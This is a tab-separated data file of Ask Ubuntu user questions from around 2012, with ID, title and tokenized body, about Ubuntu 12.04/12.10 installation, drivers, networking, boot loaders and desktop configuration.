214018	how to make wget faster or multithreading ?	i 've just upgraded my computer hardware ( cpu + motherboard + graphic card + memory + hard disk ) , so that install a new os is needed . i tried to download debian-6.0.6-amd64-netinst.iso with wget command but the speed is so slow that i could not bear . 4kb/s ~ 17 kb/s , slow like a running turtle , or even more slower if i use chrome . i 've read the help information of wget , it seems like there are no options could make it more faster . is there anyway to make wget faster ? or is it possible to make it multi-threading download ? ps : my bandwidth is 4m . i use this command : wget -c url http : //hammurabi.acc.umu.se/debian-cd/6.0.6/amd64/iso-cd/debian-6.0.6-amd64-netinst.iso
214019	how to install burg in dual boot windows7/ubuntu 12.10 ?	can anyone help me in installing burg in my dual-boot windows7/ubuntu 12.10 laptop ? precautions to be taken while doing so is also highly appreciated .
214023	setting default application to open files through filezilla ?	i have installed sublime text 2 . i have set all the default files to open with this . however , when i open a file from my server using filezilla ( by right-clicking and file and then click `` view/edit '' ) it still opens up in gedit . can i change this ?
214024	ubuntu boot confirmation	i wan na know is it possible to disable ubuntu for boot selection on start up , because sometime after reset ( usually on power loss ) it needs to be confirmed , i would like to make ubuntu to boot always the default value , without confirmation thanks
214027	problems when installing kernel 3.6.6 .	today i downloaded and installed latest version of kernel 3.6.6 from this site kernel.org on ubuntu 12.10 64 bit . but when i used this command to update : $ apt-get dist-upgrade i found it updating the previous version 3.5.0-18 and i do n't know why . i want know if when install newer version of kernel must be older one remove automatic ?
214034	thunderbird contacts sync with ubuntu one on ubuntu 12.10	how can i get thunderbird contacts to sync with ubuntu one on ubuntu 12.10 quantal ?
214040	where is unity ?	i am using ubuntu 12.10 . i installed updates and graphics card driver . after that , i lost desktop . this is screenshot . no unity , panel and others . driver = ati mobility radeon hd 5430 . driver version v12.10
214043	`` sudo apt -get install foo- '' causes removing foo package and everything depends on it	while working in command prompt , i accidentally typed following command : sudo apt-get install python3- and ubuntu started removing python3 and everything depends on it ( including firefox and much more ) . fortunately i closed that terminal immediately and reverted everything by checking dpkg log file , but i was wondering why an install command should act like remove ? is it a bug ? consider the situation that you are looking for a package name ( pressing tab twice ) and going through possibilities by pressing enter key and those enter keys remain in the keyboard buffer and ... . youhaaaa ... apt-get is removing the entire installation in front of your eyes .
214046	storing application preferences and data	i am looking at creating some ubuntu applications , but finding good resoures are hard . i am using the quickly toolkit , but would really like some more insight . how does one normally store application preferences and settings in linux / ubuntu . is it as simple as creating a xml file and saving the information and then reading from said file on application bootstrap ? if someone can point me in a direction it would be greatly appreciated . edit this is something i wrote whilst waiting for a reply . probably exactly what preferences does , but just coded out . you might find it usefull : import configparser , os # we need to be able to store and recal settings # first try to read the config.cfg file config = configparser.rawconfigparser ( ) configfile = 'data/config.cfg' # we need to set some defaults monstate = false tuestate = false wedstate = false thurstate = false fristate = false satstate = false sunstate = false # creating the config file def createconfigfile ( filename ) : print `` creating config '' # not needed , but nice for debugging config.add_section ( 'preferences ' ) config.set ( 'preferences ' , 'mon ' , false ) config.set ( 'preferences ' , 'tues ' , false ) config.set ( 'preferences ' , 'wed ' , false ) config.set ( 'preferences ' , 'thur ' , false ) config.set ( 'preferences ' , 'fri ' , false ) config.set ( 'preferences ' , 'sat ' , false ) config.set ( 'preferences ' , 'sun ' , false ) rewriteconfigfile ( filename ) # after reading the config file , we can update configs in memory . # but this will save it to file for when the application is started up again . def rewriteconfigfile ( filename ) : with open ( filename , 'wb ' ) as configfile : config.write ( configfile ) # reading the config file def readconfigfile ( filename ) : print `` reading config '' # not needed , but nice for debugging global monstate , tuestate , wedstate , thurstate , fristate , satstate , sunstate monstate = config.getboolean ( 'preferences ' , 'mon ' ) tuestate = config.getboolean ( 'preferences ' , 'tues ' ) wedstate = config.getboolean ( 'preferences ' , 'wed ' ) thurstate = config.getboolean ( 'preferences ' , 'thur ' ) fristate = config.getboolean ( 'preferences ' , 'fri ' ) satstate = config.getboolean ( 'preferences ' , 'sat ' ) sunstate = config.getboolean ( 'preferences ' , 'sun ' ) # if the config does not exist , create it , then read it . otherwise simply read it if not config.read ( configfile ) : createconfigfile ( configfile ) readconfigfile ( configfile ) else : readconfigfile ( configfile )
214047	12.04 does not upgrade to 12.10	my ubuntu is 12.04 , i tried to follow the instructions in : http : //www.ubuntu.com/download/desktop/upgrade , but the upgrade button does not appear .
214050	do you need sudo rights to shutdown on ubuntu ?	i am looking to migrate a snoozer application i originally wrote in windows on autoit , which when it comes down to it is a shutdown snoozer . i list faling asleep to a movie or show , but i wake up if my pc runs through the night . so i built an application which notifies you that there is a pending shutdown and you have 10 minutes to snooze this otherwise the pc shuts down . the application allows you to repeat this prompt for x times and on a y interval . my question is , in ubuntu will i need sudo rights to shutdown . if so , how can i prevent the application from continually asking the user to authenticate as sudo in order to shutdown the system properly ? ?
214055	how to share file with user with just read privileges	there is one user lets call him b and he needs access just to read the file means read access and that file is own by another user a . how can i grant access to user a 's file to user b .
214058	what is the difference between ltsp-server and ltsp-server-standalone packages ?	what is the difference between ltsp-server and ltsp-server-standalone packages ? and what packages i must use for setting up ltsp-cluster root server . according to this link https : //help.ubuntu.com/community/ubuntultsp/ltsp-cluster the root server use the ltsp-server and dhcp3-server packages .. but i think ltsp-server-standalone and isc-dhcp-server packages is the newer one ... . is that okay if i use ltsp-server-standalone and isc-dhcp-server instead ? sorry newbie question
214059	can you apply noatime on ext3 partitions at realtime ?	an application accesses a disk directory containing about 3 million files ( including directories ) . i would like to apply the noatime option for that filesystem and i would like to know whether i can do that while applications are running and accessing that filesystem . the command i 'd apply would look like this : mount -o remount , noatime / any experience with that ? i run one single application using the file system , and it is a 100 % java application ( 1 jvm running ) . ubuntu version : 9.10 ( karmic ) thanks !
214060	unity in 12.10 comes up behind other windows	i 've just upgraded from 12.04 to 12.10 . for the most part , everything works fine , but i have a few small problems with unity , or maybe compiz . when i hit the super key , or click on the dash launcher , the dash sometimes comes up behind the other windows on the screen . as you can imagine , this makes it somewhat tricky to use . once it has started coming up behind , no amount of trying again will convince it to come back to the front . possibly related , the alt-tab switcher does n't show either . it maybe that there is n't one , or maybe that 's behind also ? alt-tab does switch the windows , but there 's no visual indicator . when i hit super-w , the windows do all do the zoom thing , but it 's slow and juddery where it used to be smooth in 12.04 . i 'm using the standard `` radeon '' driver , same as before , with a triple-head monitor setup ( and that works fine ) . i 've not tried the proprietary drivers as i 've previously found the multi-monitor support much weaker than the default driver , but maybe that 's the way to go now ? video play fine . even webgl seems ok. do other see this problem ? is it a bug ? or have i just got some left-over config from 12.04 in the way ?
214062	is it possible to create a virtual drive and share via usb ?	my question is kind of hard to follow , but i 'm asking if it 's possible to make a virtual flash drive and sync it to another device with a usb to usb cable ? to make things more clear , think of a typical flash drive . you connect it to a laptop and it shows up as a removable disk . is it possible to make a computer a host of a `` virtual drive '' that would be connected to a usb cord on one end , and the other end connecting to another device such as a xbox 360 , or another computer .
214063	instant messenger for ubuntu and windows	does anyone know if there is an instant messenger that can ( easily ) be installed and work on both windows ( 7 ) and ubuntu ?
214071	black screen after boot ( after installing nvidia drivers )	i installed ubuntu 12.10 on my old laptop . i downloaded new nvidia drivers that released yesterday ( my vcard is 7000m ) and installed it as described here . after rebooting , i see for 1 second login promt and then black screen with cursor , but i ca n't type anything . i removed nvidia drivers in safemode , but problem does n't solved . what to do ?
214073	help needed after wubi install	the installation went well as shown on http : //www.ubuntu.com/download/help/install-ubuntu-with-windows - but when booted through 'ubuntu ' option , a screen shows a grub > prompt . what to do next ? ?
214074	installing apache , php and mysql on ubuntu 8	i want to install php , mysql and apache on my ubuntu , i tried all tasks but i can not do it . there is no package php , apache or mysql please help me
214079	get information from virtual machine manager using php	is it possible to retrieve information from virtual machine manager using a php code ? i tried through exec commands but could n't get anything in browser as result . please any help to complete this task . am using ubuntu server 11.04 and kvm as hyper-visor . i have installed virtual machine manager . please do n't suggest any tool to install .
214081	dpkg returned an error code ( 1 ) for libc6 : i386 and libtinfo5 : i386 while trying to install anything	when i try to install anything through apt-get or synaptic i keep on getting this ... fetched 23.6 mb in 1min 10s ( 336 kb/s ) debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up libc6 : i386 ( 2.15-0ubuntu10.3 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing libc6 : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libtinfo5 : i386 : libtinfo5 : i386 depends on libc6 ( > = 2.4 ) ; however : package libc6 : i386 is not configured yet . dpkg : error processing libtinfo5 : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libc6 : i386 libtinfo5 : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help pls ?
214085	need a few reboots to connect to wireless	i am running xubuntu 12.10 on my msi wind u100 netbook . i have a problem with the wireless connection . whether the wireless connects automatically to a known wifi hotspot ( both at home and starbucks ) is temperamental . sometimes i need to reboot one or more times to get it connected . otherwise , it tries and keep asking me to enter the password ( which is saved and when it works it does , so the problem is not with the password ) . every time my computer awakes up from sleep the same problem . i have to do a reboot to connect to wireless . i searched everywhere but found no solution . i would greatly appreciate if someone has any solution . i will gladly share the hardware/software or config info , if asked , but i do n't know exactly what to share and where to find them . thanks you for any help .
214088	installing python with idle	i used the synaptic package manager to download the following : python ( was already installed ) , libpython3.2 , python3.2-dbg , idle-python3.2 , ' python3.2- minimal ( was already installed ) when i run the idle i type a simple line like print `` some sample text '' and i get a syntax error . can someone tell me what i 'm doing wrong ? python 3.2.3 ( default , oct 19 2012 , 20:13:42 ) [ gcc 4.6.3 ] on linux2 type `` copyright '' , `` credits '' or `` license ( ) '' for more information . ==== no subprocess ==== > > > print `` some sample text '' syntaxerror : invalid syntax > > >
214094	calling script on reboot only after mongodb has started	i 'm using the @ reboot option as a root cron to update mongodb when we do a reboot of a ec2 instance . the problem i have is mongodb is n't loaded at the point the cron runs the script . where is the best place to run a post mongodb start on server startup ?
214096	remove ubuntu and install ubuntu server as a fresh start	i have ubuntu 12.04 installed on my laptop and i want to remove it and install ubuntu server . how would i do that ?
214097	problem raised after changing the system hostname	i have changed the hostname of my computer from dar to hus by editing the /etc/hosts file and /etc/hostname file . now the problem is that some software which were installed under 'dar ' are not working properly . like eclipse is not updating and it is looking for its repository in a path which consists dar as home and now does not exist . what to do now ?
214099	how to change thunderbird 's display time to 24h format ?	currently thunderbird displays time in am/pm mode . how can i change it to 24h mode ? update 1 : $ locale |grep lc_time lc_time= '' en_us.utf-8 ''
214105	cpu high temperature 12.10 while high cpu usage	i have a problem with high temperature of processor while running applications that use all 8 cores of processor with load of close to 100 % during the all running time . and the running time for those applications can be sometimes several hours or days ... i have dell xps 17 laptop with i7 processor that has 8 emulated cores . for example , if i am using all 8 cores by running some independent treads , the temperature reaches very fast 90 ( c ) degrees and it stays like that . if i reduce the number of independent threads to 4 , so only 4 cores are busy , the temperature is reduced to around 80 ( c ) degrees . just for a reference , average temperature of processor while idle is around 55 ( c ) . some suggestion how to avoid so high temperatures while using all processing power ( 100 % of all 8 cores ) ?
214108	ftp client - get file in one command	i have the following ftp client conversation : variscite @ variscite-desktop : ~ $ ftp 192.168.100.10 connected to 192.168.100.10 . 220 ( vsftpd 2.3.5 ) name ( 192.168.100.10 : variscite ) : anonymous 331 please specify the password . password : 230 login successful . remote system type is unix . using binary mode to transfer files . ftp > get hello hello local : hello remote : hello 200 port command successful . consider using pasv . 150 opening binary mode data connection for hello ( 7796 bytes ) . 226 transfer complete . 7796 bytes received in 0.01 secs ( 702.8 kb/s ) ftp > exit 221 goodbye . is it possible to do this in one command , or write a shell script which does the same ? client computer is ubuntu 12.04 , and i need to do this without installing additional packages .
214111	how to install virtualbox to use windows or other os ?	i want to use windows 7 or 8 but i do n't know to install a software like virtualbox which we have to do with the use of terminal . i do n't want to use windows as a main os so i want to use it in virtualbox . can you tell me how to install downloaded files in ubuntu . i once installed java runtime but do n't know the meaning of the lines which i have written in terminal , i just did as the blog posted by a man says .
214116	cant locate file/find.pm in @ inc	as i said earlier , there is some directory called verilog which is hdl language used for hardware description . inside this directory there are many sub-directories and .v files are available . so i need to search for a pattern called clk in all the files and the directory with the line number exactly where is the pattern located in each file and i need the count how many times clk has appeared . now i could able to go through the directories and files but i could not get the line number of the file where the pattern has occured and the count ( how many times the pattern has repeated ) this is what i am looking for.can you plz help me on this ? # ! usr/bin/perl -w # use strict ; # use findbin ; # use lib file : :spec- > catdir ( $ findbin : :bin , 'lib ' ) ; # use extutils : :installed ; use file : :find ; use file : :slurp ; my $ in_dir= '' /home/prodigydell3/verilog '' ; my @ all_files ; my $ pattern='test > clk ( \n|\t|\s ) < /test ' ; find ( sub { push @ all_files , $ file : :find : :name if ( -f $ file : :find : :name ) ; } , $ in_dir ) ; my $ count=0 ; foreach my $ file_ ( @ all_files ) { my @ file_con=read_file ( $ file_ ) ; foreach my $ con ( @ file_con ) { my $ match = `` true '' if ( $ con=~m/ $ pattern/igs ) ; $ count++ ; } print `` the pattern is found in $ file_ and number of lines is $ count \n '' ; }
214123	how to remove wubi installed ubuntu without affecting windows files ?	i have windows 7 in my laptop with that i have installed ubuntu 11.04 using wubi with partition . now i want to remove ubuntu from my laptop without affecting my windows files and data . is there any effective way to do this ?
214127	laptop display shows nothing after vga-projector is being connected	after plug in my external projector to the vga-port my laptop display becomes black . only the external projector can be used . the system-settings does n't affect it either . i 'm using a integrated graphics card from intel ( intel gma45 ) . this problem is present since updating ubuntu to version 12.10 . before that everything went fine ( cloning , extending displays ) . are there any occurences regarding to updated software ( e.g . xorg ) ? kind regards
214129	brightness control does n't seem to work on a toshiba satellite m115 laptop	i have ubuntu 12.04 lts on a toshiba satellite m115 laptop . the brightness control does n't seem to work with the `` brightness and lock '' setting or fn+f6 and fn+f7 ( which usually works in windows ) . how can i adjust the brightness and/or access different power settings , so my computer is n't running on full power all the time ?
214130	zero bytes on home partition	i decided to replace the hard drive on my machine running ubuntu 12.04 lts . after using the new hard drive for a few days , i noticed that the new hard drive has bad sectors . so i decided to plug my old hard drive back in . first , i plugged both hard drives in and copied some data files from the new hard drive to the old one . after unplugging the new hard drive , i booted the computer with the old hard drive , and here i got a surprise : i can see 0 bytes available on my /home partition ! the df utility shows that the /home partition has 0 available bytes . i have tried to move some files . but i still has 0 bytes on /home ! however , gparted correctly shows that the available size is near 2gb . update 1 : to my surprise , system monitor shows me that approximately 2 gb are free and 0 bytes are available on the /home partition . it 's slightly shocked me ! are `` free '' and `` available '' not the same ? any help is really appreciated !
214135	ubuntu 12.10 / media playing problem	i recently upgraded my os and i have now ubuntu 12.10 ( the gnome 3 version ) . since i installed this os , i have a problem in playing media files or video/audio in general . at random times , ( usually every 2~10 min ) the media playing freezes for a moment and you can hear/see a hiccup in the audio/video . this happens in every media , whether it 's a video/audio file from hdd , stream from internet , youtube video , anything . i have a sample file of vlc playing an audio stream . http : //www.sendspace.com/file/42ybmc does anyone know what this problem may be ? i never had it with ubuntu 10.04 or with win7 on the same pc . ( there was not any hardware changed )
214137	how to install to install jre-7u7-linux-x64.tar.gz	i have just download a file jre-7u7-linux-x64.tar.gz and i am new to ubuntu so i do n't know how to install it . i only can install a software from software center . can someone help me to install it on ubuntu 12.04 os and tell me the steps so that another time i do n't need to ask question to install a file .
214139	why kodos is not part of the available packages in ubuntu quantal 12.10 ?	i 'm running the 64-bit edition of ubuntu quantal and i 've used extensively kodos , a user friendly regex editor . it seems that for some reasons , this package has been deleted from the ubuntu quantal repositories . ( https : //launchpad.net/ubuntu/quantal/amd64/kodos/2.4.9-6.3ubuntu1 ) is someone aware about what was the motive of such decision ? for those who , like me , used this utility , what choices are we left with ? if possible , i 'd like to avoid any compilation nor the need to virtualize a previous ubuntu release just to use one utility . thank you in advance to shed some light on this point .
214140	how to get nvidia 555m working on ubuntu 12.10 ( drivers , optimus , cuda ) ?	i 'm trying for few days to get my gpu working properly on alienware m14x with gpu nvidia 555m , but i have no luck at all . after fresh ubuntu install i did follow the guide here nvidia optimus and ubuntu 12.10 and istalled bumblebee without problems . tested glxspheres/optirun glxspheres both working fine . now i was continuing to install cuda as is said here how can i get nvidia cuda or opencl working on a laptop with nvidia discrete card/intel integrated graphics ? but i 'm getting : driver : not selected toolkit : installation failed . using unsupported compiler . samples : installation failed . missing required libraries . i did not select the driver as i though bumblebee installed driver already . how should i proceed ? and also at what point is the nvidia driver being installed and how can i try its working ? bumblebee seems to be installing the driver , cuda wants to do the same , its all a bit confusing really . sorry if its lame question , but i would really want to at least get graphic card and second screen working.. thank you for any help .
214147	clementine error : the stream is encrypted and decryption is not supported	so clementine wo n't play some songs from my ipod and give the error in the title . anyone knows if there is a way to fix this ? i 'd appreciate any help .
214148	how to save opened windows ?	my question should be pretty simple . i have 12.10 with gnome 3.6 as desktop , and i was wondering if it is possible to shutdown my computer and then start up again and all my windows and screens was restored from earlier , and just popped up again as before ?
214150	ubuntu 12.10 wo n't display properly after kernel upgrade	after updating my system today , ubuntu 's does n't display correctly . the desktop was working properly before , but now it looks like this : i had to use the terminal to run synaptic package manager , so i could view the update history , which is as follows : commit log for wed nov 7 11:50:36 2012 upgraded the following packages : linux-image-generic ( 3.5.0.17.19 ) to 3.5.0.18.21 installed the following packages : linux-image-3.5.0-18-generic ( 3.5.0-18.29 ) linux-image-extra-3.5.0-18-generic ( 3.5.0-18.29 ) prior to this issue , the last active driver was nvidia-current-updates , version 304.51 . i tried using the nvidia-current driver , version 304.51.really.304.43 instead , but the problem persists . i tried running nvidia-settings from terminal , so i could try configuring something , but the application informs that the nvidia driver is not being used . as the x-swat repository has nothing for quantal , i desperately used the unstable x-edgers repository and upgraded , but to no avail ; so i purged it . the display should normally be full hd , but the only available resolutions now are 1024x768 ( 4:3 ) and 800x600 ( 4:3 ) . the system is a dell xps-l702x , with nvidia geforce gt 555m graphics , and a 17 '' screen . how can i fix this problem ? update : i tried using the nouveau third-party driver and this fixes the issue . however , if you have any idea how to get the nvidia drivers working properly with the latest kernel , please share ; as i 've noticed some videos playing very slowly on the system , though i 'm not sure exactly why .
214154	grub loader error	i bought a laptop which has windows 7 as an os but i want to try ubuntu so i install ubuntu in a new drive which was done well so i do n't like the two os and i deleted the drive which contains windows 7 but when i restart my laptop i got grub loader error and i again install ubuntu 12.04 in that drive which i have formated now i have the 2 os which is same and again i deleted a ubuntu drive again the same error came so again i install ubuntu in that drive so can you guys help me to remove the another ubuntu without that error
214156	wireless does not work anymore after software update with ubuntu 12.10 on a dell latitude e6230	i just installed ubuntu 12.10 on my dell latitude e6230 , on first boot wifi worked properly but when i updated the software it stopped working . i ca n't figure out the problem ... the wireless network controller is a broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) '' lshw -class network '' gives , for the above controller : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7d00000-f7d03fff after reading the answer to another similar question , i edited the file networkmanager.conf to make `` managed=true '' , but that did not make any difference , it is as if the wireless adapter were not there . in the `` network '' setting window , i only see `` wired '' and `` network proxy '' . wireless has just disappeared : rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no and that 's it ! nothing about the wireless controller ... any suggestions ?
214157	dash does n't recognize that application is installed	i 've installed geary from the software center , but i ca n't launch it from the dash nor did i manage to create an app icon on the launcher . the software center has no problem seeing that the app is installed ( see screenshot ) running the command `` geary '' will launch the app . is there any way i can force the dash to function properly ? thanks , calixte ps : does anyone know what this problem is related to ? i tried re-installing the app and restarting the computer but that has no effect at all . i have practically installed nothing on this computer , so i ca n't imagine what app could interfere with the dash
214158	finishing tab missing in print dialog	we have a hp laserjet 600 m602 network printer that also includes a stapler , to immediately staple printed documents . in 12.04 in the print dialog there was a `` finishing '' tab where i could choose that the document should be stapled . however in 12.10 this tab is missing , even though the stapler is listed as `` installed '' under the installable options . i have tried to install the printer as a hp jetdirect printer as well as a ipp printer , but it makes absolutely no difference . why do i not get the option to use the stapler , even though it is selected as installed ?
214164	how do i make ubuntu look like windows 98 or xp ?	after using lps os and feeling its very fast and simple.i got interested in transforming ubuntu into this kind of desktop feeling but i can not find any article or tutorial on the internet about it . i would like any help like linking to tutorial or making a tutorial for me here . i really want to learn this . thank you
214166	how to set up hvr-2250 tv card in ubuntu 12.10	i have the hvr-2250 , the system does see it , card 3 , but i ca n't figure out how to get it going to watch tv . i have my tv and kaffine . any body have a step by step by step ? it works great in windows 7 64 bit with wmc . i would like to switch over to linux and have some of the same abilities . thanks
214168	default gconf and dconf for all users	i am trying to find a way to set the default gconf and dconf settings for all users . i know in the /usr/share/glib-2.0/schemas has xml files for the settings . i changed the settings in the xml files with root and created a new user and the settings did not transfer . under /etc/skel does not have any local user settings . i want default gtk theme , fonts for all users . how can i do that ?
214170	what 's the default /etc/network/interfaces ?	i messed up my network configuration . can anyone help me and copy the default /etc/network/interfaces ?
214172	what are the best latex editor/compiler ?	i 'm looking for a latex editor/compiler that does not show the output until it is done . it can be in terminal or not , i do n't care .
214175	wifi connection to scanner not working	i have a samsung nc10 running ubuntu 12.04 with wifi connection to a netgear dg834pn router with wifi connection to an epson sx515w multi function printer . i also have a desktop machine running 12.04 with wired connection to the router . the nc10 prints with no problem as does the desktop . the desktop also operates the scanner with no problem . if i connect the nc10 with usb to the scanner that also works , but it will not scan while connected to the network wirelessly . i have only just updated from 10.04 , and it was working perfectly before the update . please help .
214176	how to install flash player 11 debug on ubuntu 12.04 ?	i had hard time to figure this out , but i did it finally and i 'm going to post an answer to my own question for others .
214177	delete file then run file at startup	i 'm running the music player foobar2000 through wine at startup . for some reason when i shutdown ubuntu the foobar2000 process is ended abnormally in wine and when it runs next time i get an annoying `` start in safe mode ? '' message . not a huge problem , but i 'd like it fixed . the safe mode message only appears if a file called `` running '' is present when foobar2000 starts ( if it is n't deleted when closed properly ) . so by deleting `` running '' then starting foobar2000 , the message does n't appear . i thought it would be easy enough to enter this as a startup command , however it does n't want to work . the command i am using is rm '/home/henry/.wine/drive_c/users/henry/application data/foobar2000/running ' ; '/home/henry/.wine/drive_c/program files ( x86 ) /foobar2000/foobar2000.exe ' which works fine if i just run it from terminal , the file is deleted then foobar2000 runs . does anyone know why this is n't working at startup ? also , will this run with a terminal visible ? how can i make just the gui appear ?
214181	installing wine on 64 bit	i have tried to install wine through the software center and terminal and i get this error . chris @ ubuntu : ~ $ sudo apt-get install wine1.5 [ sudo ] password for chris : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.16-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages .
214184	how can i start skype in invisible mode ( from command line ) regarless of how i logged out ?	usually skype for ubuntu stars in the same online mode ( online , away , dnd , invisible ) that you left it . is there a command-line option or a skype public api hack to start skype for ubuntu in invisible mode regardless of how i left it ? skype -h does not provide help but there could be an unducmented option . i suspect its no problem for the public api but i have zero experience with it .
214185	unable to switch desktop environment/gui 's at login page	i 'm unable to switch to the gnome environment from the default ubuntu user login page . the list comes up , but when i click gnome , it does n't select the gnome enviromnent . when i click back to see the username , ubuntu is still the default .
214189	need help changing owner of external hard drive	my understanding of code is about zero . i can open a terminal window , and type commands that are given to me , but that 's about it . if someone can help me with this question , and explain at a level i 'm likely to understand , thanks . if not , thanks anyway . i have an external hard drive with two partitions . i bought this drive when my operating system was apple , 10.5 or so , and it was formatted as hfs+ with that system . now , connecting the hd to my linux system , i can read files , but i have about 1.5 tb of space that i ca n't use , because i am not the owner of the file , so ca n't write to the hd . short of reformatting the hd , is there a way for me to set the permissions for the hd so i can write to it ? again , thank you .
214190	why would video stutter on hdmi but not on dvi ?	i 've got a system running ubuntu 12.04 with an i3 2120t cpu/gpu . when i play video through mplayer , i notice when i 'm hooked up to a screen via hdmi there is a small stutter ( 1-2 frames ) every few seconds . i do n't see this happening when i connect via dvi on the same screen . resolution and refresh rate are same for both hdmi and dvi , so i 'm not sure where else the problem could be coming from . i 've also tried two different screens , and different cables . i see the stutter with either hdmi-hdmi cables , or dvi-hdmi cable with dvi from the pc and hdmi into the screen . i do n't see the stutter with dvi-dvi cables , or when i use hdmi-dvi cables with hdmi from the pc to dvi into the screen . i 've also tried using an amd 5xxx series card with the open source radeon driver , and saw the same problem . i then tried an nvidia geforce 210 card with the closed source driver , and the stutter went away . to me this smells like a driver/mesa/glx issue ( since the problem went away with the nvidia card/driver ) , but i have no idea how to track this down .
214194	partition error	while doing create partition following error shows up error creating partition : helper exited with exit code 1 : in part_add_partition : device_file=/dev/sda , start=307198163968 , size=118189196288 , type=0x83 entering ms-dos parser ( offset=0 , size=640135028736 ) msdos_magic found looking at part 0 ( offset 32256 , size 307197725184 , type 0x07 ) new part entry looking at part 1 ( offset 307198163968 , size 332936512512 , type 0x0f ) entering ms-dos extended parser ( offset=307198163968 , size=332936512512 ) readfrom = 307198163968 msdos_magic found readfrom = 586446013440 msdos_magic found readfrom = 307205982720 no msdos_magic found exiting ms-dos extended parser looking at part 2 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 3 ( offset 0 , size 0 , type 0x00 ) new part entry exiting ms-dos parser msdos partition table detected containing partition table scheme = 1 got it error : invalid partition table on /dev/sda -- wrong signature 0. ped_disk_new ( ) failed
214195	access to ntfs partition with authentication	xubuntu allows by default the mounting of an ntfs partition without requesting any kind of authorization . how can i force it to request authorization ( fhe same way that synaptic requires authorization to make changes ) ?
214199	how do i add and/or keep subtitles when converting video ?	i have a mkv video i want to convert to mp4 , but every which way i try and convert it ( handbrake , winff , ffmpeg , mencoder , ... i lose the video 's subtitles . how can i convert the video , keeping the subtitles , or add a subtitles.srt ? i also would like 2 pass encoding with a video bitrate of 4054 and audio bitrate of 160 . thanks . i was asked for the ffmpeg -i : joe @ joe-leopard-extreme : /media/elements/home folder/videos $ ffmpeg -i iron.mkv ffmpeg version 0.8.3-4:0.8.3-0ubuntu0.12.04.1 , copyright ( c ) 2000-2012 the libav developers built on jun 12 2012 16:52:09 with gcc 4.6.3 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . [ matroska , webm @ 0x1a319a0 ] estimating duration from bitrate , this may be inaccurate input # 0 , matroska , webm , from 'iron.mkv ' : metadata : title : iron duration : 02:06:01.67 , start : 0.000000 , bitrate : 1280 kb/s chapter # 0.0 : start 0.000000 , end 546.170622 metadata : title : chapter 00 chapter # 0.1 : start 546.170622 , end 1080.579489 metadata : title : chapter 01 chapter # 0.2 : start 1080.579489 , end 1609.941667 metadata : title : chapter 02 chapter # 0.3 : start 1609.941667 , end 2101.849733 metadata : title : chapter 03 chapter # 0.4 : start 2101.849733 , end 2595.259333 metadata : title : chapter 04 chapter # 0.5 : start 2595.259333 , end 3158.488667 metadata : title : chapter 05 chapter # 0.6 : start 3158.488667 , end 3564.644400 metadata : title : chapter 06 chapter # 0.7 : start 3564.644400 , end 4052.423356 metadata : title : chapter 07 chapter # 0.8 : start 4052.423356 , end 4304.300000 metadata : title : chapter 08 chapter # 0.9 : start 4304.300000 , end 4711.206489 metadata : title : chapter 09 chapter # 0.10 : start 4711.206489 , end 5080.575489 metadata : title : chapter 10 chapter # 0.11 : start 5080.575489 , end 5700.111067 metadata : title : chapter 11 chapter # 0.12 : start 5700.111067 , end 6269.346400 metadata : title : chapter 12 chapter # 0.13 : start 6269.346400 , end 6811.471333 metadata : title : chapter 13 chapter # 0.14 : start 6811.471333 , end 7561.679000 metadata : title : chapter 14 stream # 0.0 ( eng ) : video : h264 ( high ) , yuv420p , 1920x1080 [ par 1:1 dar 16:9 ] , 23.98 fps , 23.98 tbr , 1k tbn , 47.95 tbc stream # 0.1 ( eng ) : audio : ac3 , 48000 hz , 5.1 , s16 , 640 kb/s ( default ) metadata : title : 3/2+1 stream # 0.2 ( ita ) : audio : ac3 , 48000 hz , 5.1 , s16 , 640 kb/s metadata : title : 3/2+1 stream # 0.3 ( eng ) : subtitle : pgssub ( default ) stream # 0.4 ( eng ) : subtitle : pgssub stream # 0.5 ( eng ) : subtitle : pgssub stream # 0.6 ( eng ) : subtitle : pgssub at least one output file must be specified joe @ joe-leopard-extreme : /media/elements/home folder/videos
214201	install ubuntu desktop from ubuntu mini ?	i 've installed ubuntu 12.10 from pxe , using the linux & initrd.gz files and i 'd like to update it to ubuntu desktop ( with unity , the shopping len and everything in between ) . i 've heard that i can do it by installing the 'ubuntu-deskop ' meta package , however i wonder if anyone has actually done it and if that 's enough to get an identical ubuntu installation as if i had installed it with the livedvd . thanks in advance .
214204	full internal harddrive converted to ext4 file system..what to do install windows back again ? ? plz help	hi i m a complete newbie at linux ... i had a windows 7 installed in my laptop nd drive partitioned..i installed it formatting the drive as it didnt detect i had windows 7 too already ... neverthlss it installed correctly..but now wen i m also tryng to install windows i dont have a drive of ntfs file system as it converted to ext4 completely..500 gb wd..plz help me in installing windows too ...
